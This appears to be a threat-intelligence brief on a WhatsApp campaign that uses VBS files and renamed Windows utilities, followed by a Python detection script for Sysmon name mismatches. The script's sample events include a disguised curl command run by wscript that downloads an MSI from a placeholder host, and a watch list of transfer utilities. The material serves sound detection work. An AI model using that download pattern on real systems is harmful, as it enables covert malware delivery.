WhatsApp malware campaign uses malicious VBS files to gain persistent access

Summary

A new malware campaign is targeting WhatsApp users, distributing malicious Visual Basic Script (VBS) files that leverage social engineering and living-off-the-land (LOTL) techniques. These scripts aim to establish persistent access and remote control by deploying disguised versions of legitimate Windows utilities and malicious Microsoft Installer (MSI) packages.

IFF Assessment

FOE

This campaign is bad news for defenders because it uses social engineering, living-off-the-land techniques with legitimate tools, and trusted cloud infrastructure, making it stealthy and difficult to detect.

Defender Context

Defenders should be aware of this campaign's reliance on VBS files distributed via WhatsApp and the use of LOTL techniques. They should monitor for disguised Windows utilities like curl.exe and bitsadmin.exe, and look for metadata discrepancies where a file's name doesn't match its embedded OriginalFileName, as this is a key detection signal.
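One way to hunt for the name-mismatch signal described above, written here as an added example rather than code from the original report: it reads Sysmon Event ID 1 (process creation) records, which carry both the Image path and the OriginalFileName taken from the binary's version resource, and flags processes whose on-disk file name differs from the embedded one. The field names Image, OriginalFileName, CommandLine and ParentImage are Sysmon's; the sample records, paths and the two-entry watch list are constructed for the example, and treating "-" and "?" as "metadata unavailable" is an assumption about how absent values are rendered.

```python
from __future__ import annotations

import json
from pathlib import PureWindowsPath

# Utilities the campaign is reported to deploy under disguised names. A renamed
# copy keeps the OriginalFileName recorded in its PE version resource, so the
# on-disk name and the embedded name disagree.
WATCHED_ORIGINAL_NAMES = {"curl.exe", "bitsadmin.exe"}

# Markers assumed to mean "no OriginalFileName available" in the export;
# these are skipped rather than counted as mismatches.
MISSING_MARKERS = {"", "-", "?"}


def image_basename(image: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return PureWindowsPath(image).name.lower()


def check_event(event: dict) -> dict | None:
    """Compare the Image file name with OriginalFileName for one event.

    Returns an alert dict on mismatch, or None when the names agree or the
    metadata is absent. The comparison is case-insensitive because version
    resources often carry mixed-case names (e.g. PowerShell.EXE).
    """
    image = event.get("Image", "")
    original = (event.get("OriginalFileName") or "").strip()
    if not image or original in MISSING_MARKERS:
        return None
    on_disk = image_basename(image)
    embedded = original.lower()
    if on_disk == embedded:
        return None
    # A renamed copy of a watched utility is the campaign's signal; any other
    # mismatch is reported at lower severity, since some legitimate launchers
    # embed a different name (see the pwsh sample below).
    severity = "high" if embedded in WATCHED_ORIGINAL_NAMES else "medium"
    return {
        "severity": severity,
        "image": image,
        "original_file_name": original,
        "command_line": event.get("CommandLine", ""),
        "parent_image": event.get("ParentImage", ""),
    }


def scan_events(lines) -> list[dict]:
    """Run check_event over JSON-encoded Sysmon Event ID 1 records, one per line."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        alert = check_event(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample records in the shape of Sysmon Event ID 1; the paths,
# file names and command lines are illustrative, not indicators from the campaign.
SAMPLE_EVENTS = [
    # Genuine curl: on-disk name matches the embedded name, no alert.
    r'{"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe", "OriginalFileName": "curl.exe", "CommandLine": "curl.exe -V", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
    # curl renamed and launched by a script host: high-severity mismatch.
    r'{"EventID": 1, "Image": "C:\\Users\\Public\\Documents\\update.exe", "OriginalFileName": "curl.exe", "CommandLine": "update.exe -s -o pkg.msi https://example.invalid/pkg.msi", "ParentImage": "C:\\Windows\\System32\\wscript.exe"}',
    # bitsadmin renamed: high-severity mismatch.
    r'{"EventID": 1, "Image": "C:\\Users\\Public\\Libraries\\wsvc.exe", "OriginalFileName": "bitsadmin.exe", "CommandLine": "wsvc.exe /list", "ParentImage": "C:\\Windows\\System32\\wscript.exe"}',
    # Benign mismatch: a framework-generated launcher reporting its managed assembly's name.
    r'{"EventID": 1, "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "OriginalFileName": "pwsh.dll", "CommandLine": "pwsh.exe", "ParentImage": "C:\\Windows\\explorer.exe"}',
    # No version metadata: skipped, not alerted.
    r'{"EventID": 1, "Image": "C:\\Users\\Public\\tool.exe", "OriginalFileName": "-", "CommandLine": "tool.exe", "ParentImage": "C:\\Windows\\explorer.exe"}',
]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['image']} reports "
              f"OriginalFileName={alert['original_file_name']} "
              f"(parent: {alert['parent_image']})")
```

Run as a script it prints three alerts: two high (the renamed curl and bitsadmin copies) and one medium (the pwsh launcher). The medium tier exists precisely because the mismatch alone is not proof of tampering; baseline it against your estate and escalate when the embedded name is a download or transfer utility, or the parent is a script host.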
